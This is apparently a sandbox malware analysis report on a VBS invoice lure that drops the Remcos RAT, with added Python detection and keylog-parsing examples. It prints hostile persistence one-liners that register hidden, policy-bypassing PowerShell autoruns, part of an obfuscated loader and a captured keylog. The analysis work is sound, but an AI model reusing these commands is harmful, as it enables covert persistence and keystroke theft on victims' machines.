                                                                                                SHA-256:AEC1335E2B9FA6608C668C1B98A6FB512CDCC3FF797E05A050CF4090182615F7
                                                                                                SHA-512:E26D31783A9475F75E37CCB273642977A223CCE7BAAB266AD6A4899B8D7ED0EE3ABA774EAD1BA72D8D94479649BB1D5A1AC8C2AEB35862A3C1F51AFC3F72E1A8
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.72990466722989
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:IeF/2VJ43CMvcGkvhkvCCty14lTeHp14lTeH8:zeJyUSyeeeR
                                                                                                MD5:C30EE93FB44F2E9CB000750759B229D6
                                                                                                SHA1:802F01EC56F2393CDE58F12FA4EF989E141FBF66
                                                                                                SHA-256:60F20FD4F52A6BA5044236DD45F9F7E400BA710CF9657F1639DBFD5D5BEBEC9B
                                                                                                SHA-512:330BB969FF72B93B298375D5593397E938BF39DE07C8A9742716E32C7F643E99D4313D37FC01C25D867349EE5E2785FD3DB73A0830B8E91FEAA7ED59B709A217
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.7304049989621277
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:5nxm33CxH5GkvhkvCCty14lTFHp14lTeH8:VxmyZSyeZeR
                                                                                                MD5:0E567C6FEC650E915360D782F5859EEA
                                                                                                SHA1:97D704E85604B7563BD62A12521C1194F358A7CA
                                                                                                SHA-256:AEC1335E2B9FA6608C668C1B98A6FB512CDCC3FF797E05A050CF4090182615F7
                                                                                                SHA-512:E26D31783A9475F75E37CCB273642977A223CCE7BAAB266AD6A4899B8D7ED0EE3ABA774EAD1BA72D8D94479649BB1D5A1AC8C2AEB35862A3C1F51AFC3F72E1A8
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.7304049989621277
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:5nxm33CxH5GkvhkvCCty14lTFHp14lTeH8:VxmyZSyeZeR
                                                                                                MD5:0E567C6FEC650E915360D782F5859EEA
                                                                                                SHA1:97D704E85604B7563BD62A12521C1194F358A7CA
                                                                                                SHA-256:AEC1335E2B9FA6608C668C1B98A6FB512CDCC3FF797E05A050CF4090182615F7
                                                                                                SHA-512:E26D31783A9475F75E37CCB273642977A223CCE7BAAB266AD6A4899B8D7ED0EE3ABA774EAD1BA72D8D94479649BB1D5A1AC8C2AEB35862A3C1F51AFC3F72E1A8
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.7304049989621277
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:5nxm33CxH5GkvhkvCCty14lTFHp14lTeH8:VxmyZSyeZeR
                                                                                                MD5:0E567C6FEC650E915360D782F5859EEA
                                                                                                SHA1:97D704E85604B7563BD62A12521C1194F358A7CA
                                                                                                SHA-256:AEC1335E2B9FA6608C668C1B98A6FB512CDCC3FF797E05A050CF4090182615F7
                                                                                                SHA-512:E26D31783A9475F75E37CCB273642977A223CCE7BAAB266AD6A4899B8D7ED0EE3ABA774EAD1BA72D8D94479649BB1D5A1AC8C2AEB35862A3C1F51AFC3F72E1A8
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.7304049989621277
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:5nxm33CxH5GkvhkvCCty14lTFHp14lTeH8:VxmyZSyeZeR
                                                                                                MD5:0E567C6FEC650E915360D782F5859EEA
                                                                                                SHA1:97D704E85604B7563BD62A12521C1194F358A7CA
                                                                                                SHA-256:AEC1335E2B9FA6608C668C1B98A6FB512CDCC3FF797E05A050CF4090182615F7
                                                                                                SHA-512:E26D31783A9475F75E37CCB273642977A223CCE7BAAB266AD6A4899B8D7ED0EE3ABA774EAD1BA72D8D94479649BB1D5A1AC8C2AEB35862A3C1F51AFC3F72E1A8
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.7304049989621277
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:5nxm33CxH5GkvhkvCCty14lTFHp14lTeH8:VxmyZSyeZeR
                                                                                                MD5:0E567C6FEC650E915360D782F5859EEA
                                                                                                SHA1:97D704E85604B7563BD62A12521C1194F358A7CA
                                                                                                SHA-256:AEC1335E2B9FA6608C668C1B98A6FB512CDCC3FF797E05A050CF4090182615F7
                                                                                                SHA-512:E26D31783A9475F75E37CCB273642977A223CCE7BAAB266AD6A4899B8D7ED0EE3ABA774EAD1BA72D8D94479649BB1D5A1AC8C2AEB35862A3C1F51AFC3F72E1A8
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....h.89$.....I9$......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^VY."...........................%..A.p.p.D.a.t.a...B.V.1.....VY%"..Roaming.@......CW.^VY%"..........................f...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^VY "..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.7296298967758137
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:I6F/2VJ43CMvcGkvhkvCCty14lTeHp14lTeH8:zeJyUSyeeeR
                                                                                                MD5:D9F3CADFF0EA70898F92A28D99AE4541
                                                                                                SHA1:9F2945974FF14101AA852E5F0AB4FB10D7792719
                                                                                                SHA-256:18DD10C4EF97793ECAA6CF972E1B879DCC38D4CEF09301195C4DA1F41F46CB1F
                                                                                                SHA-512:A579FC03F7FA06A94B43F563AF790A6B486B30EBA87F3B916B4455E8B4E2F037ED675CA08BC780D7F00E8B0CE92CE6EA65D3FBF247744BB12C3BC773CC0E807F
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...-/.v.....v.K9$..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....h.89$..@.O[9$......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^VY."...........................%..A.p.p.D.a.t.a...B.V.1.....VY/"..Roaming.@......CW.^VY/"..........................i`(.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^VY "..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^VY+"..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^VY+"....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^VY+"....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^VY+"..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^VY,"....Q...........
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.7304438473090666
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:I0F/2VJ43CMvcGkvhkvCCty14lTeHp14lTeH8:VeJyUSyeeeR
                                                                                                MD5:36D36D173CAD522EFEE86C1FCA244D83
                                                                                                SHA1:DBAD10F22BA6A7C3970C0E2833E5BFB9E6429895
                                                                                                SHA-256:AA8E596E7AE78C62F89DEFAB736F5293DBE9D2E68DECD407858BE43433F65958
                                                                                                SHA-512:BF1A330E3B4727FB4EA8BAC7BE06F0244C401ACC867CCAB32CB6BCB870A84728A1235DED573A5F46C55D72ADBF1CEFCF6A4D934F9B668350895D733E7104C201
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...-/.v.....v.K9$..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....h.89$.....Q9$......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^VY."...........................%..A.p.p.D.a.t.a...B.V.1.....VY/"..Roaming.@......CW.^VY/"..........................i`(.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^VY "..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^VY+"..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^VY+"....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^VY+"....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^VY+"..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^VY,"....Q...........
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.7301941477875236
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:IbxJ43CMvcGkvhkvCCty14lTeHp14lTeH8:+xJyUSyeeeR
                                                                                                MD5:122A9B9FCC56970A0E7DA3A81BF6040A
                                                                                                SHA1:C395D52B94822380718B027013240E898DC0DDB8
                                                                                                SHA-256:D8379069B658664695D586B73DAA6C08B9CCE2D3404F52F522446A18A7E27518
                                                                                                SHA-512:6166BBE0FB4CD102DB513A64B662FBC7E3D6C1FF150A6865224E4F32C47C411BC2E6F9DD95C03DCF592984B31751673C643AAD3EFFD91D902D5648D551200F41
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...-/.v.....v.K9$..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....h.89$....K9$......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^VY."...........................%..A.p.p.D.a.t.a...B.V.1.....VY%"..Roaming.@......CW.^VY%"..........................f...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^VY "..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^VY+"..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^VY+"....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^VY+"....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^VY+"..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^VY,"....Q...........
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (32626)
                                                                                                Category:dropped
                                                                                                Size (bytes):1972354
                                                                                                Entropy (8bit):3.8503551024098552
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:u/bDLzGUTBJpHXd2KP9Mw9On3vft7AJe922sSmZEVEhgpAWtc96jXbgCeppLOCHb:y9zBGnaf1WijzF
                                                                                                MD5:C008884C5CC200DD287C6F6346CBB7C1
                                                                                                SHA1:CCF7B1BAD818C7B2C7E0E40434FA45983F3140EE
                                                                                                SHA-256:5938A76E698A7719E9F2EF619390CE9247DD9C2E1554CAF9CE832397A29C5E6A
                                                                                                SHA-512:AACBB1F7EDC88D2850945167AD140AA4F194AC1DCCA2355478A94731023C5EBFEC65D7CD6AD6602098A90DEEB10CF0D972E86A725BDD88B9F75C92D6A5F934B3
                                                                                                Malicious:true
                                                                                                Preview:..$.z.s.b.D.t. .=. .'.C.:.\.W.i.n.d.o.w.s.\.M.i.c.r.o.s.o.f.t...N.E.T.\.'. .+. .'.F.r.a.m.e.w.o.r.k.\.v.4...0...3.0.3.1.9.\.'. .+. .'.A.d.d.I.n.P.r.o.c.e.s.s.3.2...e.x.e.'.;.....$.X.o.h.s.K. .=. .".?.?.%.y.z.X.V.M.%.".....$.U.e.b.T.a. .=. .'..!:..!'.;...$.X.K.v.H.v. .=. .'.A.'.;.....$.W.Y.v.t.t. .=. .'.T.V.q.Q..!:..!.!:..!M..!:..!.!:..!.!:..!.!:..!E..!:..!.!:..!.!:..!.!:..!/./.8..!:..!.!:..!L.g..!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!Q..!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!g..!:..!.!:..!.!:..!.!:..!.!:..!4.f.u.g.4..!:..!t..!:..!n.N.I.b.g.B.T.M.0.h.V.G.h.p.c.y.B.w.c.m.9.n.c.m.F.t.I.G.N.h.b.m.5.v.d.C.B.i.Z.S.B.y.d.W.4.g.a.W.4.g.R.E.9.T.I.G.1.v.Z.G.U.u.D.Q.0.K.J..!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!B.Q.R.Q..!:..!.!:..!
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with very long lines (393), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):393
                                                                                                Entropy (8bit):5.217656004204946
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:sDuwZH1j0IQHjo50E5rcsny1R3KbQO0c+EkjAuwknaZ5/5wR55wR55wR55UO45Nx:sVVj0ZsngkbQpc++prH2iiGT7
                                                                                                MD5:1AFA8F6D9F706690E21B6415D3C930B7
                                                                                                SHA1:EC97BDBF96CCBBA27DE986A0B9E50C4B565D341A
                                                                                                SHA-256:385FBA09DF99171EECBF2A27D6EE49D8B6F7CD9FBA22C0B794BFDF028C765FAF
                                                                                                SHA-512:CB4051A2396245E4D51E6010636E93B514CED89AA941D21D67AE3F6340FF0D44B8D6AC09683DA91934957C62F9ABF8A5AE4B6AF6FE6480862358E5C7935DDF24
                                                                                                Malicious:false
                                                                                                Preview:New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "Update Drivers NVIDEO_zhs" -Value "cmd.exe /c start /min `"`" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command `". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' `";exit" -PropertyType "String" -force ; exit
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with very long lines (397), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):397
                                                                                                Entropy (8bit):5.206282316627512
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:sDuwZH1j5tjo5oGrcsny1R3KbQO0c+EkjAuwknaZ5/5wR55wR55wR55UO45NHRn:sVVjfsngkbQpc++prH2iiGT7
                                                                                                MD5:95945B1FA36829B64221AB93E6FD6257
                                                                                                SHA1:F40B9EF85B2A31ED7160429D60231DFC1F4C089F
                                                                                                SHA-256:1CB1AB43A76799D6FA475F7F19FF6544D0BBF50A37B488BC07197689317BEBFD
                                                                                                SHA-512:42CCFF8FF8B801EC5178372E7B3F125CAF61A8814ADA9DED936B4C29707F495BBE015E7F48ECE4631FAA32C623C5A0483ABC5AD5A16A5E011DBF906488C39EC7
                                                                                                Malicious:false
                                                                                                Preview:New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" -Name "Update Drivers NVIDEO_fdm" -Value "cmd.exe /c start /min `"`" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command `". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' `";exit" -PropertyType "String" -force ; exit
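The two dropped one-liners above register the same loader twice, under Run and under RunOnce, each as a minimised cmd.exe wrapper that starts a hidden PowerShell with the execution policy bypassed and dot-sources a .ps1 buried under AppData\Roaming. As an added example that is not part of the report or of Joe Sandbox, the following Python triages autorun values for exactly those traits and then correlates the launched script path across keys, which is the behaviour the report labels "Creates multiple autostart registry keys". The sample hive is constructed: the two NVIDEO values are the ones written above (with PowerShell's `"`" escapes resolved), the OneDrive entry is an invented benign control, and the nested-dict hive layout is an assumption; on a live host it would be populated from the registry.

```python
import re
from collections import defaultdict

# The autorun value the two dropped New-ItemProperty one-liners write under Run
# and RunOnce, with PowerShell's `"`" escapes resolved to plain "" (taken from
# the report, not constructed).
REMCOS_LOADER_CMD = (
    r'cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden '
    r'-ExecutionPolicy Bypass -command ". '
    r"'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO"
    r"\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' "
    r'";exit'
)

# Constructed sample hive: the two entries from the report plus an invented,
# benign OneDrive value as a control. Layout {key: {value name: data}} is an
# assumption; on a live host fill it from winreg / Get-ItemProperty.
SAMPLE_AUTORUNS = {
    r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run": {
        "Update Drivers NVIDEO_zhs": REMCOS_LOADER_CMD,
        "OneDrive": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    },
    r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce": {
        "Update Drivers NVIDEO_fdm": REMCOS_LOADER_CMD,
    },
}

# One indicator per trait of the command line above. powershell.exe accepts
# unambiguous prefixes of its switches (-w, -ep, -c ...), so the patterns allow them.
INDICATORS = {
    'minimised cmd wrapper (cmd /c start /min "")':
        re.compile(r'\bcmd(?:\.exe)?\s+/c\s+start\s+/min\s+""', re.I),
    "hidden PowerShell window":
        re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I),
    "execution policy bypass":
        re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I),
    "dot-sourced script":
        re.compile(r"-c[a-z]*\s+\"?\.\s+'", re.I),
    ".ps1 under the user profile":
        re.compile(r"\\AppData\\(?:Roaming|Local)\\[^'\"]*\.ps1", re.I),
}

# The single-quoted .ps1 the command ultimately runs; used to correlate entries.
SCRIPT_PATH = re.compile(r"'([^']+\.ps1)'", re.I)


def triage_value(command: str) -> list[str]:
    """Names of every indicator that fires on one autorun command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(command)]


def triage_autoruns(autoruns: dict) -> list[tuple[str, str, list[str]]]:
    """(key, value name, indicators) for every entry with at least one hit."""
    findings = []
    for key, values in autoruns.items():
        for name, command in values.items():
            hits = triage_value(command)
            if hits:
                findings.append((key, name, hits))
    return findings


def duplicated_payloads(autoruns: dict) -> dict[str, list[str]]:
    """Launched .ps1 paths that are registered under more than one autorun key.

    Run and RunOnce both pointing at the same loader is the 'multiple autostart
    registry keys' behaviour; paths are lower-cased because NTFS is case-insensitive.
    """
    seen = defaultdict(set)
    for key, values in autoruns.items():
        for command in values.values():
            m = SCRIPT_PATH.search(command)
            if m:
                seen[m.group(1).lower()].add(key)
    return {path: sorted(keys) for path, keys in seen.items() if len(keys) > 1}


if __name__ == "__main__":
    for key, name, hits in triage_autoruns(SAMPLE_AUTORUNS):
        print(f"{key}\\{name}")
        for hit in hits:
            print(f"    - {hit}")
    for path, keys in duplicated_payloads(SAMPLE_AUTORUNS).items():
        print(f"same payload under {len(keys)} keys: {path}")
```

The indicators are deliberately independent of the value name and of the "NVIDEO" directory names, since both are chosen by the operator; the traits that survive re-packaging are the hidden window, the policy bypass, the dot-source and the user-writable script location.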
                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):652
                                                                                                Entropy (8bit):3.361430792840248
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:6lWecmlGlVbWFe5UlMfhlAAbWtlq+f6e5UlYYclAbW+:6VcmszWqUyO0Wtw+fDUSjOW+
                                                                                                MD5:0ED8AA02C015C227162AD805F8C0AB98
                                                                                                SHA1:7FE533013790F7A18C3C5F091DBB29163CE37AFE
                                                                                                SHA-256:835620E55D110488973CACEF4C88E83FE7038A1D2A8AE4BDC65D5771F89748F2
                                                                                                SHA-512:0F944878D24111AB91E6A364356FF772748BCA501B4560B0F79A4E0FD27E64A4E091100C6EEED5C1F237BD438A44D2EFC7B7550508ACA03045EC79C9AEFAAA2F
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\kanspt.dat, Author: Joe Security
                                                                                                Preview:....[.2.0.2.4./.1.0./.2.2. .0.0.:.1.7.:.2.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.1.0./.2.2. .0.0.:.1.7.:.2.5. .R.u.n.].........[.2.0.2.4./.1.0./.2.2. .0.0.:.1.7.:.2.7. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.1.0./.2.2. .0.0.:.1.7.:.3.2. .R.u.n.].........[.2.0.2.4./.1.0./.2.2. .0.0.:.1.7.:.3.6. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.2.0.2.4./.1.0./.2.2. .0.0.:.1.7.:.4.0. .C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.c.m.d...e.x.e.].....[.W.i.n.].r.....[.2.0.2.4./.1.0./.2.2. .0.0.:.1.7.:.4.1. .R.u.n.].........[.2.0.2.4./.1.0./.2.2. .0.0.:.1.7.:.4.4. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
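The kanspt.dat preview above is the Remcos offline keylog: UTF-16LE text, CRLF line endings, a "[YYYY/MM/DD HH:MM:SS <window title>]" header each time the foreground window changes, and the keys typed in that window on the following lines, with special keys written as bracketed tokens ([Win] in the preview). As an added example, not code from the report, from Joe Sandbox or from Remcos, the following Python parses that layout into per-window entries and tokenises the keystrokes. The sample bytes are constructed from the preview; the final Notepad entry and its [Enter] token are invented to exercise the tokenizer, and the rest of Remcos' special-key vocabulary is assumed to follow the same bracketed form since the page shows only [Win].

```python
import re
from dataclasses import dataclass
from datetime import datetime

# Constructed sample in the layout visible in the kanspt.dat preview: UTF-16LE,
# CRLF, "[YYYY/MM/DD HH:MM:SS <window title>]" headers, then keystrokes with
# special keys as bracketed tokens. The Notepad entry and [Enter] are invented;
# everything else mirrors the preview.
SAMPLE_LOG = (
    "\r\n[2024/10/22 00:17:24 Offline Keylogger Started]\r\n"
    "\r\n[2024/10/22 00:17:25 Run]\r\n"
    "\r\n[2024/10/22 00:17:27 Program Manager]\r\n"
    "[Win]r\r\n"
    "[2024/10/22 00:17:32 Run]\r\n"
    "\r\n[2024/10/22 00:17:36 Program Manager]\r\n"
    "\r\n[2024/10/22 00:17:40 C:\\Windows\\system32\\cmd.exe]\r\n"
    "[Win]r\r\n"
    "[2024/10/22 00:17:41 Run]\r\n"
    "\r\n[2024/10/22 00:17:44 Program Manager]\r\n"
    "\r\n[2024/10/22 00:18:02 Untitled - Notepad]\r\n"
    "whoami[Enter]\r\n"
).encode("utf-16-le")

# A header is a whole line: timestamp, a space, then the window title up to the
# closing bracket. Titles may contain brackets themselves, so the match is greedy.
HEADER = re.compile(r"^\[(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) (.*)\]$", re.M)
# One keystroke: either a bracketed special-key token or a single character.
TOKEN = re.compile(r"\[[^\]\n]+\]|.")


@dataclass
class KeylogEntry:
    when: datetime
    window: str
    keys: list[str]  # one element per keystroke or bracketed special key

    def typed_text(self) -> str:
        """The printable keystrokes with special-key tokens dropped."""
        return "".join(k for k in self.keys if not k.startswith("["))


def parse_remcos_keylog(raw: bytes) -> list[KeylogEntry]:
    """Split a Remcos offline keylog into one entry per window-change header."""
    text = raw.decode("utf-16-le").lstrip("\ufeff").replace("\r\n", "\n")
    headers = list(HEADER.finditer(text))
    entries = []
    for i, m in enumerate(headers):
        end = headers[i + 1].start() if i + 1 < len(headers) else len(text)
        # Line breaks between keystrokes are log layout, not typed input.
        body = text[m.end():end].replace("\n", "")
        entries.append(KeylogEntry(
            when=datetime.strptime(m.group(1), "%Y/%m/%d %H:%M:%S"),
            window=m.group(2),
            keys=TOKEN.findall(body),
        ))
    return entries


def windows_with_input(entries: list[KeylogEntry]) -> list[KeylogEntry]:
    """Only the windows in which something was actually typed."""
    return [e for e in entries if e.keys]


if __name__ == "__main__":
    for entry in windows_with_input(parse_remcos_keylog(SAMPLE_LOG)):
        print(f"{entry.when:%Y-%m-%d %H:%M:%S}  {entry.window!r}: {''.join(entry.keys)}")
```

The timestamps are whatever the victim's clock said, written without a zone; when lining the log up against the sandbox's Suricata timeline below, note that the keylog reads 00:17 while the capture is stamped 06:17 +0200.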
                                                                                                File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                Entropy (8bit):3.459279172780773
                                                                                                TrID:
                                                                                                • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                                                                • MP3 audio (1001/1) 32.22%
                                                                                                • Lumena CEL bitmap (63/63) 2.03%
                                                                                                • Corel Photo Paint (41/41) 1.32%
                                                                                                File name:DHLShippingInvoicesAwbBL000000000102220242247.vbs
                                                                                                File size:517'176 bytes
                                                                                                MD5:d68363e3776ef2ea3277d9b24edd935b
                                                                                                SHA1:dedcbb524e3fa621b716fbb4f4dea800e6279e1a
                                                                                                SHA256:a22fb5a6beb7587e89ed509ba36d193070c2cb7ef5cc9cb2393823037265c39b
                                                                                                SHA512:fbd166567d7ffe069f620b3fe27a1f1ff89e3f98f9fa9689732fbd5a591c10d3b710e4ce8a06f086033b981cc51d2161692a087b3b6d4729b60c822c1268a24c
                                                                                                SSDEEP:1536:errrrrrrrrrrrrrrrr166666666666666666666666666666666666666666666z:O
                                                                                                TLSH:A6B49A0B66EF5508B1B76F586A7250780B677E5E99BCC69C01CCA41E0FE3A40C961BF3
                                                                                                File Content Preview:..........'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'. .w.t.k.v.r. .'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'. .....O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t.:.:.:.:.:.:.:. .z.G.U.b.c.j.U.e.R.M.K.F.d.I.q.m.V.W.z.r.N.N.B.z.S.t.X.d.U.y.o.J.u.B.o.k.u.l.s.U.y
                                                                                                Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-22T06:17:08.765856+0200 | 2841075 | ETPRO MALWARE Terse Request to paste .ee - Possible Download | 1 | 192.168.2.4 | 49732 | 188.114.96.3 | 443 | TCP
2024-10-22T06:17:13.710351+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49734 | 188.114.96.3 | 443 | TCP
2024-10-22T06:17:13.710351+0200 | 2841075 | ETPRO MALWARE Terse Request to paste .ee - Possible Download | 1 | 192.168.2.4 | 49734 | 188.114.96.3 | 443 | TCP
2024-10-22T06:17:16.611141+0200 | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 188.114.96.3 | 443 | 192.168.2.4 | 49735 | TCP
